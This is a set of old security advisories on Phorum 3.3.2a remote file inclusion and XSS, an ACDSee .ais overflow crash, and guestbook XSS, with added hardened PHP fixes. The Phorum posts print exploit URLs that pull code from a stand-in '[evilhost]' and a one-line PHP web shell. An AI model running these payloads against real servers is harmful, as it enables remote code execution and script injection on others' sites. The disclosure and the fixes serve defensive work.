Phorum 3.3.2a has another bug for remote command execution
Target: Phorum 3.3.2a (maybe older)
Description: Phorum 3.3.2a lets remote users execute arbitrary code
Found by: Markus Arndt [EMAIL PROTECTED]
Vendor: http://www.phorum.org
Notified Vendor: Yes, already fixed in 3.3.2b

Details:
Another bug for remote command execution. This time it's admin/actions/del.php :)

Some code:

  <?php
  require "$include_path/delete_message.php";
  delete_messages($id);
  QueMessage("Message(s) $id and all children were deleted!<br>");
  ?>

The URL to exploit the script would be:

  http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&cmd=ls

That URL will make the script include http://[evilhost]/delete_message.php

GoGoGo and secure your boxes. :)

One other thing before I forget: CSS attacks are possible on 2 files..

  http://[host]/phorum/admin/footer.php?GLOBALS[message]=<script>alert('css strikes!');</script>
  http://[host]/phorum/admin/header.php?GLOBALS[message]=<script>alert('css strikes!');</script>

Markus Arndt [EMAIL PROTECTED]
http://skka.de

No more lost lottery tickets, no more forgotten winnings! With the WEB.DE lottery service: http://tippen2.web.de/?x=13
Phorum 3.3.2a remote command execution
Target: Phorum 3.3.2a (prior versions?)
Description: In Phorum 3.3.2a (a bulletin board) there's a security flaw that lets remote users include external PHP scripts and execute arbitrary code.
Found by: Markus Arndt [EMAIL PROTECTED]
Vendor: http://www.phorum.org
Notified Vendor: Yes, already fixed version available

Details:
After extracting the Phorum 3.3.2a archive we have lots of PHP files and subfolders. I just snooped around a bit and found this file vulnerable to remote script inclusion:

  ./plugin/replace/plugin.php

Let's see some code:

  <?php
  include("$PHORUM[settings_dir]/replace.php");

  function mod_replace_read_body ($body) {
      global $pluginreplace;
      reset($pluginreplace);
      while(list($key,$val) = each($pluginreplace)) {
          $body = str_replace($key,$val,$body);
      }
      return $body;
  }

  $plugins["read_body"]["mod_replace"]="mod_replace_read_body";
  ?>

Easy one..

  http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls

This one will get the file http://[evilhost]/replace.php and execute it. If [evilhost] has PHP enabled we could use this one as replace.php:

  <? echo("<? system(\$cmd); ?>"); ?>

If it's not PHP-enabled, simply:

  <? system($cmd); ?>

Markus Arndt [EMAIL PROTECTED]
http://skka.de
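Both Phorum posts above describe the same shape: a path prefix that arrives in a global variable (via register_globals) and is used directly in require/include, so a URL supplied as the prefix becomes a remote include. The following is an added example, not Phorum's code: the vulnerable shape beside a hardened version that resolves the file name against a fixed directory. It assumes PHP 7.1 or later; the function names, $base_dir and the delete_message.php file name are illustrative.

```php
<?php
// Added example (not Phorum's code). Assumes PHP >= 7.1.

// Vulnerable shape, as in admin/actions/del.php: with register_globals=On
// (the PHP 4 default of that era) the query parameter include_path is
// simply this variable, so ?include_path=http://[evilhost] makes the
// subsequent require fetch http://[evilhost]/delete_message.php.
function vulnerable_include_target(string $include_path): string {
    return "$include_path/delete_message.php";   // attacker controls the prefix
}

// Hardened: never build an include path from request data. Only accept a
// bare file name, resolve it inside a fixed directory and confirm the
// resolved path still lies within that directory.
function safe_include_path(string $base_dir, string $name): ?string {
    if (!preg_match('/\A[A-Za-z0-9_]+\.php\z/', $name)) {
        return null;                                  // no slashes, no URLs, no ".."
    }
    $base = realpath($base_dir);
    $path = realpath($base_dir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null;                                  // directory or file does not exist
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;                                  // escaped via symlink or traversal
    }
    return $path;
}

// Demonstration with the hypothetical values from the post.
$evil = 'http://[evilhost]';
echo vulnerable_include_target($evil), "\n";          // the remote include the post exploits

// The same request data fails the hardened check:
var_dump(safe_include_path(__DIR__, $evil));          // null: not a bare file name
var_dump(safe_include_path(__DIR__, '../etc/passwd')); // null: rejected by the regex

// A legitimate name resolves only if the file really exists in $base_dir:
$resolved = safe_include_path(__DIR__, 'delete_message.php');
if ($resolved !== null) {
    require $resolved;
}
```

The code fix is what matters, but two php.ini settings shrink the blast radius of this whole bug class: register_globals=Off (the default from PHP 4.2 and removed entirely in PHP 5.4) stops request parameters from becoming variables, and allow_url_include=Off (available from PHP 5.2) prevents include/require from fetching URLs even when the path is attacker-controlled.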
Possible Buffer Overflow in ACDSee 4.0
While playing around with ACDSee's photo album files (.ais extension) I noticed a bug that seems to me like a buffer overflow. ACDSee's .ais files are built up like this:

  [absolutepath]\filename.gif description
  [absolutepath]\some.gif mydog
  [absolutepath]\dunno.gif mycat

I filled one description up to 260 chars. Then I loaded the file in ACDSee. Nothing special.. But when I wanted to see the picture's properties the app just crashed. It seems that ACDSee can't handle more than 256 chars in the description when displaying the properties dialog (or maybe I'm just an idiot ;D).

Grab a sample photo album file at http://skka.de/acdsee_bug.zip. The included GIF has to be placed directly on c:\ because ACDSee only allows absolute paths in these files and I couldn't give any relative path to the GIF.. :/ Otherwise the .ais file will seem not to contain any pictures and you can't trigger the bug by selecting the pic's properties in the context menu.

Maybe somebody finds out more..

Markus Arndt [EMAIL PROTECTED]
Philip Chinery's Guestbook 1.1 fails to filter out js/html
Target: Philip Chinery's Guestbook 1.1 (maybe older versions?)
Vendor: http://www.sector7g.de.vu
Notified Vendor: Sure
Affected Systems: Webservers that run Philip Chinery's Guestbook 1.1
Found by: Markus Arndt [EMAIL PROTECTED]
Short Description: Philip Chinery's Guestbook 1.1 fails to filter out JScript/HTML (cross-site scripting)

This nice lil' guestbook lets the owner choose to filter out JScript and/or HTML entries.. Let's see the start of its sub where it saves an entry:

---code starts---
sub SaveData {
    if($kill_html == 1) { $Text =~ s/<([^>]|\n)*>//g; }
    if($kill_html == 2) { $Text =~ s/</&lt;/g; $Text =~ s/>/&gt;/g; }
    if ($kill_java) { $Text =~ s/<!--(.|\n)*-->//g; }
    $Text =~ s/\n/&nbsp;<br>/g;
    $Text =~ tr/|/ /;
    $Text =~ s/\t/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/g;
    $Text =~ s/\cM//g;
    # (rest of the sub omitted in the post)
---code ends---

That's all it filters out.. As we can see, it only filters the comment itself that a user wrote! For example the fields Name, EMail or Homepage are NOT checked! So let's build a URL to exploit this..

  http://[target]/cgi-bin/guestbook.pl?action=sign&cwrite=none&Name=<script>alert('gotcha!');</script>&[EMAIL PROTECTED]&Text=css%20example

This would post a message that would display an alert box on a visitor's screen when accessing the gb..

As I noticed, the guestbook logs IP addresses but doesn't prevent spam. It also automatically redirects posters back to the main guestbook page. That makes it very easy to post entries that e.g. force visitors to spam the guestbook (really annoying).

Sorry for bad English, hope you can understand what I'm talkin' about. ;)

Markus Arndt [EMAIL PROTECTED]
http://skka.de

100 MB and even more good reasons! Sign up now and benefit. There's more in it for you at http://club.web.de/?mc=021103
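The gap the post describes is that only the comment body ($Text) is filtered while Name, EMail and Homepage are written out untouched. The following is an added example, not the guestbook's code (which is Perl); it is written in PHP to match the other example on this page and shows a save step that encodes every submitted field, not just the comment, and additionally restricts the Homepage scheme because entity encoding does nothing against a javascript: link target. The field names mirror the post's URL; the input is constructed and the function names are illustrative.

```php
<?php
// Added example (not the guestbook's code). Assumes PHP >= 7.0.

// Encode every guestbook field for HTML output. The original only
// filtered the comment body; an attacker simply moved the payload into
// Name, which the guestbook printed as-is.
function encode_entry(array $fields): array {
    $out = [];
    foreach (['Name', 'EMail', 'Homepage', 'Text'] as $key) {
        $value = (string)($fields[$key] ?? '');
        // ENT_QUOTES also encodes ' and ", so the value is safe inside
        // attribute values as well as in element content.
        $out[$key] = htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }

    // Homepage is emitted as an href. Encoding does not stop
    // javascript:alert(1), so only accept http(s) URLs; drop anything else.
    $homepage = (string)($fields['Homepage'] ?? '');
    if (!preg_match('#\Ahttps?://#i', $homepage)) {
        $out['Homepage'] = '';
    }

    // Preserve the original behaviour of turning newlines into <br>,
    // but only after encoding so user-supplied tags never survive.
    $out['Text'] = nl2br($out['Text']);
    return $out;
}

// Constructed input mirroring the post's exploit URL (hypothetical values).
$posted = [
    'Name'     => '<script>alert(\'gotcha!\');</script>',
    'EMail'    => 'someone@example.invalid',
    'Homepage' => 'javascript:alert(1)',
    'Text'     => "css example\nsecond line",
];

$safe = encode_entry($posted);
print_r($safe);

// What the guestbook page would then render for the Name field:
echo '<b>', $safe['Name'], '</b>', "\n";
```

The encoding happens once, at output time, for every field the page renders; validating the link scheme is a separate step because it is a different problem (a harmful but perfectly well-formed attribute value) that no amount of HTML escaping addresses.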